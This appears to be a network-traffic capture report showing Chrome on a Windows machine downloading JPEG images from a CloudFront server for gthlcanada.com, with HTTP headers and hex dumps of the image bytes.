                                                                                                                          2025-01-13 21:01:19 UTC1024INData Raw: 46 05 34 f5 16 e0 69 dd 22 a4 2a f7 35 2d 05 1c 7c 47 15 28 43 5a c2 f7 1c 00 a0 62 8a 49 8e 98 c6 4a 7e 59 5b 52 52 54 b4 e3 3d a9 75 9e 9e 9e 29 9f a5 f5 fe 93 d4 cd a3 f6 65 d5 95 92 38 4e 71 4f 26 82 14 90 52 b0 47 c8 d2 6d 91 af 19 66 e8 65 a7 9a 1d a4 69 1f 64 21 e4 71 5e 24 7c ab 6c 62 bc c8 14 64 dd 03 21 01 63 0a 19 14 50 c4 6d 6d 96 52 02 13 9c f0 28 fa c0 23 bd 07 d2 06 4e 70 07 34 28 af 04 8d 93 1a 46 d1 68 73 a9 95 ad e6 d9 98 72 ed e5 86 be f7 81 e6 04 0e 7a 73 ed 50 67 8b 1d ed 6e cb 6d fe c7 e9 69 e9 fb fc 84 f9 6a 52 15 f1 30 8e d9 22 a4 6f 10 3b e1 69 db 4d 3c a7 01 f3 66 c8 cb 31 98 07 95 2c f6 57 d0 57 3e ee 57 19 da 86 f1 26 f7 73 75 4e cb 96 b2 b7 16 a3 9f cb e8 2a 06 ed 74 34 0c 2c 8f 72 56 ad e1 e7 48 0b ac a2 ba ac 61 8d e3 e6 8b
                                                                                                                          Data Ascii: F4i"*5-|G(CZbIJ~Y[RRT=u)e8NqO&RGmfeid!q^$|lbd!cPmmR(#Np4(FhsrzsPgnmijR0"o;iM<f1,WW>W&suN*t4,rVHa
                                                                                                                          2025-01-13 21:01:19 UTC2754INData Raw: 0c 6b 27 1f 44 29 01 23 20 50 cc 2d 20 e1 47 02 88 aa 63 3d 6a 6c 2f 38 38 a1 d2 3a 91 91 da 98 b8 15 61 8e 41 c8 4b 0c 29 a3 8e 85 03 47 e2 20 17 53 eb 4d 94 3a 59 ec 4d 19 85 78 71 95 7c 60 f7 a4 cb 54 84 35 6c d4 35 05 22 b2 00 42 78 ec 29 cd 6d 74 88 e3 06 a3 a8 37 f4 c8 29 42 56 33 4e 88 17 45 0c 00 72 29 9c ad 27 2a d9 43 54 ce 58 ac ef 86 5d 0b b8 fb 80 2f d1 f6 fb 75 e5 69 49 16 e2 d3 8e b2 96 c2 db 90 54 0f 2a 07 b7 6a 98 a4 69 4f 1b da 51 87 4d bb 57 e9 cd 50 db 43 e1 44 84 86 ca 87 cb 02 a0 ff 00 07 da a7 73 ad 7a c6 fa 8d b0 d3 70 2f 2f 3d 09 0b 9b 12 63 fe 59 e9 49 e1 49 57 bf 35 69 24 ef 86 e8 5a 50 da 75 6f 87 5b fa 40 fe f1 db 6b c2 42 47 cf 03 bd 5b 2c ee 73 a9 46 56 45 d5 6e aa 8a eb 20 6b 58 f0 70 70 71 9d ff 00 ba 8c 1c de 3f 18 9a 77
                                                                                                                          Data Ascii: k'D)# P- Gc=jl/88:aAK)G SM:YMxq|`T5l5"Bx)mt7)BV3NEr)'*CTX]/uiIT*jiOQMWPCDszp//=cYIIW5i$ZPuo[@kBG[,sFVEn kXppq?w
                                                                                                                          2025-01-13 21:01:19 UTC9000INData Raw: 46 98 58 5c 5a 42 92 aa 63 e8 cb 6e 34 4e c3 4f ea d3 dc 2b 37 a2 b5 34 5d 5b 63 6a eb 18 e1 4a 48 0e 36 7b b6 a1 dc 52 d9 41 ce 71 55 a3 6d 75 9c 8d 1b 78 eb 7b a9 c8 72 3e 07 d3 9e 12 3f 98 55 94 85 3a 25 ca 23 33 e0 bc 1d 61 f4 85 a1 63 d4 55 42 e1 40 fa 37 ef c1 5e 80 e8 8e a4 8e fd 44 d0 e3 fc 46 8d fe 7f 35 b7 41 f6 af 14 8f 95 0b 41 ba e7 4f e5 51 c1 5e 70 92 ee 61 c2 a4 c5 68 e1 4f fc 00 fb 67 d6 94 95 f7 1b 1d b3 ce 79 d4 b2 c4 76 ca 94 a2 71 db b9 a2 d6 a6 93 36 e0 fc e9 27 f7 2d fe ed 1c 76 57 bd 44 7b df b8 4d cc 71 cd 29 68 7c 18 ec ab fd a1 d4 9f ef 15 e8 3e 83 9a 73 4d 4e fa 89 43 47 0a 03 a8 6f 70 d8 29 0d 4c 87 73 b3 47 cd 34 37 47 73 26 eb 69 86 04 55 29 ab 73 2a 3d 0d a7 fe f3 d9 46 a4 5d 82 d5 b7 bd a1 b6 5c ef f6 38 2d 9b dd de 21 85
                                                                                                                          Data Ascii: FX\ZBcn4NO+74][cjJH6{RAqUmux{r>?U:%#3acUB@7^DF5AAOQ^pahOgyvq6'-vWD{Mq)h|>sMNCGop)LsG47Gs&iU)s*=F]\8-!
                                                                                                                          2025-01-13 21:01:19 UTC8408INData Raw: 80 e3 f7 88 3e e2 97 9d de 3f 06 f2 e4 2e e3 2f 49 31 f7 99 2b f3 5d f3 2d 5f 11 51 ef e9 8a b9 4b 51 1d 4b 47 93 20 6f aa c1 ad 56 8a be 9f a8 92 2b 95 09 98 e4 61 d8 ca ac 7a 37 47 48 dd 2d c3 8f a6 ed 28 4a 9f bd c9 54 89 4e 34 90 1b 8c 82 72 e2 be 5c 67 02 ba 3a d4 05 e8 5d 07 fb 2f 43 da 13 31 db 4c 2f 2a 1c 64 fc 01 d5 a5 3c 02 7e 67 d6 aa 86 d4 6f 47 87 cd b4 d4 3a 97 54 aa 2c d6 e5 de 26 a8 c6 0c c4 f8 63 c6 1c 25 09 1e 99 1c 9a d3 7a 7c 5e df af 92 2d 91 b6 7a e9 2a d5 6e 4a 54 a9 4f bc ce 1d 75 5e 80 05 7a 51 69 5b 4b 44 c2 e7 c9 92 9d 75 2d 1d df aa 2b e1 a7 a7 a6 73 22 68 e0 f0 ac b6 a9 d1 63 76 b6 cd 16 7d 7d 65 30 e5 4f 64 38 5b 59 eb 30 64 00 70 a4 ab eb 8a a5 da 1b 4b df f6 af c4 26 9f d3 ba 81 9f 2a 5c 3b 92 1b eb 23 e0 7d 95 e4 25 c4 e7
                                                                                                                          Data Ascii: >?./I1+]-_QKQKG oV+az7GH-(JTN4r\g:]/C1L/*d<~goG:T,&c%z|^-z*nJTOu^zQi[KDu-+s"hcv}}e0Od8[Y0dpK&*\;#}%
                                                                                                                          2025-01-13 21:01:19 UTC9059INData Raw: a2 35 74 6d 51 a4 2c fa 91 e2 95 2a e3 0d a7 97 d2 30 03 85 23 af fe 2c d3 53 74 b7 e7 43 ed 24 bb 73 5a a6 1d c5 c6 ae 81 65 b7 63 37 d4 94 14 fa 13 ef 56 51 23 74 ea 25 64 a2 d9 52 ea a3 48 d1 97 83 8c 7c d3 b6 6e 94 d1 d3 96 5f 91 a2 ac 4e b8 79 52 d7 09 04 93 fa 50 6c e9 6d 2a ca 82 99 d2 16 34 11 d8 a6 1a 3f e5 51 49 f1 8f b1 ce 34 54 2e b7 04 1c 7e 1f ba 92 45 24 cc f1 a5 b4 d1 ba 7e e6 c5 de 5f fb b1 c2 73 fa 9a 44 d7 52 b3 e2 78 53 63 a3 2f 24 e3 c8 77 e8 a7 d6 e0 d9 90 02 7f 62 5b 51 8f e5 8c 81 fe 94 3a 13 11 a4 61 98 91 d0 07 f2 b4 91 fe 95 59 a4 78 e1 d1 38 29 8b a3 2f 0f 1c f7 ea 4a 69 f1 b3 7e 21 ec db c7 74 ba d9 ed f6 59 56 c9 16 c6 53 23 12 14 0f 9a 82 70 71 8e d8 34 2c ae a5 9d c1 91 3c 65 25 57 d2 97 5a 18 5d 3c f0 90 d6 f2 54 ca 99 4b
                                                                                                                          Data Ascii: 5tmQ,*0#,StC$sZec7VQ#t%dRH|n_NyRPlm*4?QI4T.~E$~_sDRxSc/$wb[Q:aYx8)/Ji~!tYVS#pq4,<e%WZ]<TK


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          96192.168.11.204991854.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC428OUTGET /app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 58210
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Thu, 10 Oct 2024 16:35:58 GMT
                                                                                                                          ETag: "0086c3b9b8e62a82dbeeff358f329fea"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 929cbb64d024a9973633b197e2a23482.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: C0qxHCgLSnYcHBZXNckugdCAnsDCNGhxYPmFk9iAeO4_He8yYHJOpg==
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 03 2c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 09 01 0f 00 02 00 00 00 06 00 00 00 7a 01 10 00 02 00 00 00 10 00 00 00 80 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 90 01 1b 00 05 00 00 00 01 00 00 00 98 01 28 00 03 00 00 00 01 00 02 00 00 01 32 00 02 00 00 00 14 00 00 00 a0 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 b4 00 00 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30 30 44 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 32 30 32 33 3a 31 31 3a 32 36 20 30 30 3a 33 31 3a 35 35 00 00 23 82 9a 00 05 00 00 00 01 00 00 02 5e 82 9d 00 05 00 00 00 01 00 00 02 66 88 22 00 03 00 00 00 01 00 06 00 00 88 27 00 03 00 00 00
                                                                                                                          Data Ascii: JFIFHH,ExifMM*z(2iCanonCanon EOS 2000DHH2023:11:26 00:31:55#^f"'
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 94 db ec 20 e7 74 65 51 20 58 df dc 18 ed 96 b4 79 c9 de c9 dc a0 1d 21 25 a5 64 d8 2a c3 ac 19 17 ca 09 55 ef d6 01 6b cb ad a2 40 26 50 85 6d aa ba c7 92 90 0d ae 09 de f0 6b 85 29 37 10 84 d4 d4 a4 9f 8e 66 65 96 01 ea e2 c2 47 de 00 5b e0 51 cb dc 1b 8b 75 8f 24 1e fa 42 72 ef cb 4e 37 cc 97 98 69 e4 7e f3 6b 0a 1f 68 54 82 80 75 d2 18 55 72 46 d4 dc c9 33 26 7a f3 0f f0 30 72 79 8b cc 52 02 86 9a 18 62 f4 e0 9d 5c b2 8c bb a9 21 f2 9b 38 2d 7d 0c 39 94 98 71 c7 9e 42 a5 54 ca 50 ab 25 77 04 2f ce 10 0b a4 65 41 39 75 27 6b c1 5c 42 88 d0 e5 1e 70 b1 19 cd d5 d3 a4 26 e8 28 4d 85 d5 ef 0c 40 a1 20 8b 91 a4 15 69 bd c8 d6 04 b9 e0 19 74 24 68 08 81 19 b2 8e e3 7b 08 06 37 79 0e 5c 24 04 e5 3b de 3c 84 72 c5 8e e4 47 a6 15 30 1c 6b 94 da 56 14 af 1d ce
                                                                                                                          Data Ascii: teQ Xy!%d*Uk@&Pmk)7feG[Qu$BrN7i~khTuUrF3&z0ryRb\!8-}9qBTP%w/eA9u'k\Bp&(M@ it$h{7y\$;<rG0kV
                                                                                                                          2025-01-13 21:01:19 UTC5243INData Raw: fb 8f 4f fa 47 27 f7 b2 a5 fb 57 f5 3d 75 08 f4 58 bb a5 bc 8f fa 17 7f c3 c6 13 97 a4 35 52 e2 66 21 01 9a 75 35 a5 89 62 b1 f3 ae de 25 0b f6 f9 47 99 8c 93 1e e3 19 dc 77 8a 67 6b 73 eb 25 4f aa cd a3 a3 6d 8f 95 23 d0 46 93 c7 8e 23 49 3e 89 7c 01 85 0a 59 a0 52 6c db 8a 68 e8 fb 89 e9 7e a0 1f a9 b9 8c 58 e5 b9 b9 3a 47 7c 23 5b 3c 09 cf ba 5b 0b 00 a2 15 a0 10 6b 76 d4 40 8d c7 48 d5 3a 62 df 01 40 b6 97 de 06 da 47 94 8d 6d 7f 78 1b 69 03 f7 27 f2 02 35 36 22 0e 91 bd 86 d0 51 99 27 3f 48 59 09 06 c5 7a 03 0d ed 80 76 d0 2d 9b b6 a6 2e 3c 33 a2 22 bd 8c 29 72 ae a7 f6 21 c0 f3 bf e9 4e bf ca de f1 4d e7 02 52 06 88 db d6 35 ff 00 c3 dc 91 76 b9 50 a8 ad 24 86 25 c3 49 3d 2e a3 7f e5 1c be a3 9d e1 e9 a7 35 cd 1b f4 b0 52 c8 91 d0 93 15 29 69 66 d6
                                                                                                                          Data Ascii: OG'W=uX5Rf!u5b%Gwgks%Om#F#I>|YRlh~X:G|#[<[kv@H:b@Gmxi'56"Q'?HYzv-.<3")r!NMR5vP$%I=.5R)if
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: 37 8e 2b cd d2 a9 61 2c 50 69 7f b2 97 43 7e 14 38 46 85 76 f6 b0 f2 f5 89 39 8c 7d 25 4d e1 9a 70 76 1c 92 72 52 61 f4 8f 8c 9d 71 40 17 09 f9 ed 6e fb 7a 46 62 99 55 49 b7 94 91 dc 9b 68 7d e3 e9 65 9e 35 71 7b f0 73 61 f4 ec aa 4b ea 46 a2 85 1f 78 32 dd c1 01 20 58 0f 38 d3 38 0f c3 b9 6a bc cc c6 38 c4 d9 1a a1 52 73 3a 0b a2 c9 75 c4 eb 7f 34 a7 f8 d8 45 07 04 61 29 ee 21 e2 69 6a 34 a1 28 6c 9c cf 3a 76 69 b1 ba bf a4 68 5c 71 c7 d2 54 ea 74 bf 0d 70 a9 4b 54 aa 70 08 9b 52 0d c3 ab 1f a6 fd 6c 75 3d cf a4 56 0c 55 f9 66 5d 7f 55 f5 25 51 e1 70 51 f8 b7 c4 99 ae 24 62 87 6a 0a 52 91 4f 62 ed 49 30 76 43 77 dc ff 00 98 ee 62 8e 4e 6d ef 06 24 0e de f0 5e 60 da d7 8e da 55 a3 ca fc 9e 1f 35 fa 40 dc 13 6e d0 52 4f 4d 04 19 02 e7 53 61 68 4d 0d af 00
                                                                                                                          Data Ascii: 7+a,PiC~8Fv9}%MpvrRaq@nzFbUIh}e5q{saKFx2 X88j8Rs:u4Ea)!ij4(l:vih\qTtpKTpRlu=VUf]U%QpQ$bjRObI0vCwbNm$^`U5@nROMSahM
                                                                                                                          2025-01-13 21:01:19 UTC4616INData Raw: cc 92 2f 71 1e 23 c8 c3 39 84 d4 e2 c0 d0 6b 0d 9c 5c c5 ef 90 5b 78 72 bc d6 36 de 19 38 b9 90 4d 90 a3 d2 01 9e 2b 9b 36 b2 2f ac 1d 7c f7 08 ce d0 24 42 41 73 01 39 6c a2 91 f5 81 09 78 82 4a 56 2c 61 80 b2 1a 72 f9 b9 76 87 2d a1 5a 12 36 86 e3 39 23 c0 a0 3c a1 64 66 03 50 4c 20 15 2d 5f 5d 8c 08 6c 91 f3 0d 3a 41 0a 86 9a 18 10 b1 d8 c0 01 b2 11 d6 07 97 71 b8 82 95 9e 89 3f 58 69 55 9e f8 49 35 aa d6 27 c2 20 03 94 f8 b1 47 66 9d 8f 26 64 e5 d6 54 c3 8e 05 82 13 f2 85 1b 90 07 5b 5e 17 9f a4 be e4 8b d3 d2 f2 ce 34 c3 4d d9 2e 06 95 6c a0 d8 6a 3c 86 b7 87 9c 5a 5a d7 8b 99 79 80 50 b4 34 0a 94 05 bc 7a db ec 21 c7 0f 31 dc c6 1f 95 9c 62 75 b4 cd c9 cc 83 9d b7 ae 0e bb d8 8e f1 19 1c d4 6f 1a 4d 82 ab d9 5c a6 d2 66 e4 e8 cf d6 26 65 48 93 98 06
                                                                                                                          Data Ascii: /q#9k\[xr68M+6/|$BAs9lxJV,arv-Z69#<dfPL -_]l:Aq?XiUI5' Gf&dT[^4M.lj<ZZyP4z!1buoM\f&eH
                                                                                                                          2025-01-13 21:01:19 UTC1730INData Raw: b2 cc d3 6b 6f 37 2c 91 6c cd ac 12 3d 21 34 d2 a5 5e 56 77 65 9b 57 fa 84 3b 97 a6 ca 4b 24 86 a5 9a 40 26 e6 c9 de 00 69 15 f4 48 c9 a5 c4 ac 4e 4e 14 de e5 20 8d 7d 4c 39 54 8a a6 95 cc 44 db aa bf ca 8e 52 4d 87 96 b1 36 24 25 4a 89 f8 66 ae 75 f9 44 2a 86 d0 83 e1 65 20 ed a2 61 50 8a e5 42 8a dc e2 42 1f 42 16 ca 40 19 5d 97 6d 57 3d f5 30 2c 53 5b 6e 5d b6 25 9d 71 b0 82 41 0d 36 81 af 60 3a 08 b2 f2 d0 47 f7 49 ef b4 79 2d a5 37 ca 90 3d 04 14 0c 82 60 fc 02 ca 54 66 5e 07 f7 ac 2c 7d 84 3a 76 b2 fe 5f 0b 41 1d 89 05 46 25 32 f9 40 14 9e d0 d0 11 52 73 33 4f 85 29 e4 af 5d b3 0b 7d a1 cf 8d 5d 21 d1 07 f7 60 32 93 d2 00 1b 16 c9 de c2 03 93 ae a4 43 92 d9 ed 1e e5 2b b4 36 03 45 4b 8d ee a3 05 12 da ea 2d ea 61 e7 25 57 de d0 3c 91 e6 60 01 9f c3
                                                                                                                          Data Ascii: ko7,l=!4^VweW;K$@&iHNN }L9TDRM6$%JfuD*e aPBBB@]mW=0,S[n]%qA6`:GIy-7=`Tf^,}:v_AF%2@Rs3O)]}]!`2C+6EK-a%W<`
                                                                                                                          2025-01-13 21:01:19 UTC4653INData Raw: 4a 3f 68 00 76 00 8f 78 40 d6 12 1e b7 81 24 94 ee 21 08 35 db ed 01 e0 1b 26 12 b1 ef bf 68 12 83 6b 13 0c 05 80 49 be 80 47 ac 3c a0 89 d0 5a 0d 78 40 0e 91 e3 68 0d 23 c6 00 06 08 55 65 68 04 18 8b c1 4a 45 fc e0 a0 07 99 de d0 25 57 1b c2 76 d6 da c0 91 a5 b5 80 01 2b d2 d6 f7 80 4b 84 f6 bc 14 29 03 72 74 83 05 02 6c 12 40 ef 00 c3 85 9d 8c 0e 6d 21 2c c4 1d e3 c5 7e 66 1d 08 56 e4 c7 88 30 97 34 0d 6f 00 5e 55 c8 cd ff 00 48 54 31 42 93 7b ed 1e 28 30 98 78 91 a1 30 21 d2 7a 98 28 42 84 6b 01 60 4d e0 a1 d5 1d 41 80 2e 12 6f 73 00 06 cb 6e 90 16 1d 6c 21 35 39 7e fe 70 52 b2 37 3d 7b 43 01 43 97 ca 00 a4 01 a9 10 91 51 56 e6 08 73 10 53 fc 4c 2a 01 43 6f de 17 10 52 13 af 8a d0 82 f3 00 06 6f a6 b0 9d 9c cd 62 e7 48 00 72 52 00 bd ef 04 52 52 7b 42
                                                                                                                          Data Ascii: J?hvx@$!5&hkIG<Zx@h#UehJE%Wv+K)rtl@m!,~fV04o^UHT1B{(0x0!z(Bk`MA.osnl!59~pR7={CCQVsSL*CoRobHrRRR{B


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          97192.168.11.204991754.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC676OUTGET /app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.47.53-AM-730x408.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 67853
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Mon, 16 Dec 2024 16:48:05 GMT
                                                                                                                          ETag: "5ddde54fdf9cc70b26a79ca314abb274"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e67eec39bafe7d4b59266632bc2a9886.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 2h8-VKbAZSGnchTO1HBY65_oJf55LQHh2vKLWIPyzXZ_KQbp6zDDBw==
                                                                                                                          2025-01-13 21:01:19 UTC5498INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0d 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0d 0c 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 0b 00 1a 00 0c 00 1c 00 0c 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 01 e6 63 70 72 74 00 00 03 9c 00 00 00 23 77 74 70 74 00 00 03 c0 00 00 00 14 72 58 59 5a 00 00 03 d4 00 00 00 14 67 58 59 5a 00 00 03 e8 00 00 00 14 62 58 59 5a 00 00 03 fc 00 00 00 14 72
                                                                                                                          Data Ascii: JFIFICC_PROFILEapplmntrRGB XYZ acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 82 f8 91 e0 96 93 c7 7e 19 5e ed b9 63 84 6a 36 cb f8 8d 36 e8 81 94 98 0c 8e be c7 b1 ad 6d 55 9f 3e 9e 98 7b fe 19 dd 63 69 dc 68 bb 73 e8 99 e7 fe dc 77 d3 67 69 14 07 39 c7 4a bc c6 99 02 ad 9a c6 89 ab 6d 0d 6a f3 6d eb b6 8d 6b a8 e9 f3 34 17 11 30 fc ac 0e 3a 7d 28 f6 97 59 03 26 b9 9b b4 4d 15 62 5f ac b6 fd 6d ab b6 e9 e9 9e f0 ba 2a e3 a5 29 42 38 01 64 c3 0a aa 32 3c 7c c0 d4 63 20 69 4a 28 20 af ae 2b 4a 61 eb 45 71 1d 92 3c a4 75 c8 55 e6 fa 9e b5 18 28 49 39 1f fa 4f 7a 7c b2 02 43 63 a8 ee 7d e9 82 48 9f e7 e6 05 bf 9d 42 26 73 2a 91 93 f3 7a 76 c5 02 e4 e4 72 d1 f9 83 7c a3 f3 7b 54 6b 95 39 c9 35 30 ad 7f 4e 51 66 2e 47 ca 71 4a d1 02 c7 23 bc 7d bd 7e b5 52 0f 2f 3f 75 1e b4 d6 70 d1 63 2c 07 7e 95 9a 1a 33 5f 4d 59 05 e4 97 b9 7a 01 3c
                                                                                                                          Data Ascii: ~^cj66mU>{cihswgi9Jmjmk40:}(Y&Mb_m*)B8d2<|c iJ( +JaEq<uU(I9Oz|Cc}HB&s*zvr|{Tk950NQf.GqJ#}~R/?upc,~3_MYz<
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: f0 ab 4f e8 06 7f c9 45 6a b4 4a d2 74 2b 9c 9c e7 9b a9 a9 2b 64 c5 1a 50 8d ca 9d 58 e7 b5 58 cc b6 8a 2f 88 2f 89 70 59 9f 74 d8 aa e0 12 4d a0 e8 0f 6a 92 de 3f bc 4d 45 1f 9b 36 ee b2 50 d8 21 4d a2 fc d5 ac bc f1 b0 51 62 f2 19 31 d7 9f 18 c0 1f 5a b5 89 6f 1a 7f 3a 07 2c 4e 47 2b 1c 80 3d ea 22 30 66 5b 5d ff 00 74 13 c4 bc c9 ca 37 7d 98 1e df 84 5f f6 d1 4f 8f cf 13 12 a2 2a 6e bb 62 54 e4 ff 00 91 af 6f e3 5a c6 23 49 82 3c ca bc e0 77 43 81 52 a0 bf 7b 37 22 33 8e 7e 85 88 c8 14 98 c9 96 c8 b7 c4 07 c5 04 b7 9f aa dd 76 82 30 0f ca 2c d4 13 fc ea 06 e0 f8 86 78 97 d1 e0 fc 74 9b b2 dc 17 39 08 2c d7 2b f7 eb 5a d9 b8 f5 26 b5 5b 73 14 e5 67 91 99 82 af 42 40 f5 fb 56 2b 79 ad dc 32 b4 b7 6e 66 12 1c 72 1e b8 3e f4 88 c2 1e e5 be bc 74 f8 92 e2
                                                                                                                          Data Ascii: OEjJt++dPXX//pYtMj?ME6P!MQb1Zo:,NG+="0f[]t7}_O*nbToZ#I<wCR{7"3~v0,xt9,+Z&[sgB@V+y2nfr>t
                                                                                                                          2025-01-13 21:01:19 UTC13561INData Raw: 0f 7a 85 6c 91 49 0c bc e0 02 4f e5 3d 31 45 b9 b3 92 39 04 d9 20 3a e4 fd 2a eb b2 ed 74 f9 77 9e 81 0d f3 43 35 b4 da 95 ba dd 79 bf 94 47 ce 32 0f a0 1e f4 16 bb 6b 5b cb 99 63 d3 b4 eb 29 65 96 56 11 a2 22 92 59 89 c0 fe 35 f4 3b c0 9d 3a f7 44 e0 0e d4 d3 75 68 0d b5 d5 b6 83 1a 4d 1b f4 2a 7c bf 5a c3 76 ce d1 f0 81 b6 a2 b1 d5 6d ac 76 15 b5 f4 71 45 28 90 79 1c c8 e0 03 cd 9f 7c d7 96 f8 be f1 ff 00 c2 7e 1c ec 8d 5b 6a f0 ff 00 71 da 6b db a2 fe da 4b 48 56 c9 84 91 5b 73 8c 16 66 1d 07 42 70 28 39 9b 77 36 93 0f 89 98 58 ce 82 73 bc d9 b2 08 c0 5f c4 9e a4 fd 6b b8 3c 76 d3 ae b5 be 02 6f 4d 33 4e 43 2c f7 7b 76 ea 38 95 7a 96 26 13 8c 57 ce d4 77 37 4f a8 8d 66 ee 77 17 1e 70 b8 12 b7 e6 32 86 e6 07 ef 9a ec cf 84 9f 1f 9c 2b e2 2e c2 d2 b6 87
                                                                                                                          Data Ascii: zlIO=1E9 :*twC5yG2k[c)eV"Y5;:DuhM*|ZvmvqE(y|~[jqkKHV[sfBp(9w6Xs_k<voM3NC,{v8z&Ww7Ofwp2+.
                                                                                                                          2025-01-13 21:01:19 UTC10730INData Raw: cd a7 0e af e2 67 6c 71 97 4b 85 9e d3 58 d9 df 85 9a 55 1f 2b 37 37 3a 31 3f 6e 95 a7 fe 1d 1d 0f c5 53 88 6a ab cb 91 79 fd b5 b7 5e 00 f8 87 1f 13 7c 2f ed 0d 6e 49 c4 d7 56 16 bf a3 66 66 fc c1 a1 f9 3a ff 00 0a d3 ff 00 0e 24 9f 8a b7 10 4e 0f 51 79 fd a2 89 62 7b ef ff 00 95 bf 49 ff 00 d2 d1 7f aa 6a b3 fc 65 fa 71 f3 6b 7f fa 78 7f ac 6a 9f c4 5b db 6b 3f 8b 4e 99 73 77 32 c5 12 ea f0 82 ee 70 06 63 20 7f 33 53 be 30 5c 3b df bb 87 8c 5b 5f 71 68 5b 57 54 bf d3 5b 45 16 82 7b 5b 66 95 44 c1 c9 c1 e5 07 d0 8a 21 e9 9b 04 63 e1 11 ad 01 ff 00 d4 9a 8f fa d7 a9 3f 09 3d 4a 0d 1f c2 fe f8 d5 2e 6d bf 11 15 a6 a1 24 cf 09 ed 20 58 89 2a 7e f5 2e cf 40 d5 b8 7f f0 9e d5 b4 1d dd a7 4b a5 ea 07 42 bd e6 b7 b9 5e 47 05 e4 72 80 8f a8 20 d5 93 e1 69 2f 2f
                                                                                                                          Data Ascii: glqKXU+77:1?nSjy^|/nIVff:$NQyb{Ijeqkxj[k?Nsw2pc 3S0\;[_qh[WT[E{[fD!c?=J.m$ X*~.@KB^Gr i//
